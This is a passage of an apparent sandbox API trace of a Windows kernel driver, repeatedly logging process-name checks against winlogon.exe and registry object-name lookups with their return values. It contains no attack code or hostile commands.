| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11c, ret_val_ptr_out = 0xffffe0003a7879d0 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x11c, ObjectNameInfo_unk_out = 0xffffe0003a7879d0, ReturnLength_ptr_out = 0xffffd0002f3b2c98, ret_val_out = 0x0 | ||||
| RtlCopyUnicodeString | SourceString = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic, DestinationString_out = \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-BackgroundTaskInfrastructure/Diagnostic | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a7879d0, Tag = 0x0 | ||||
| _wcsicmp | _String1 = \Registry\User\, _String2 = \REGISTRY\MACHI, ret_val_out = 8 | ||||
| ExFreePoolWithTag | P_ptr = 0xffffe0003a769db0, Tag = 0x0 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| IoGetCurrentProcess | ret_val_unk_out = 0xffffe0003bd9b5c0 | ||||
| PsGetProcessImageFileName | ret_val_out = 0xffffe0003bd9ba10 | ||||
| _stricmp | _Str1 = svchost.exe, _Str2 = winlogon.exe, ret_val_out = -4 | ||||
| MmIsAddressValid | VirtualAddress_ptr = 0xffffc000ba0f8660, ret_val_out = 1 | ||||
| ObQueryNameString | Object_ptr = 0xffffc000ba0f8660, Length = 0x0, ObjectNameInfo_unk_out = 0x0, ReturnLength_ptr_out = 0xffffd0002f3b2fb8, ret_val_out = 0xc0000004 | ||||
| ExAllocatePool | PoolType_unk = 0x0, NumberOfBytes_ptr = 0x11e, ret_val_ptr_out = 0xffffe0003a769db0 | ||||
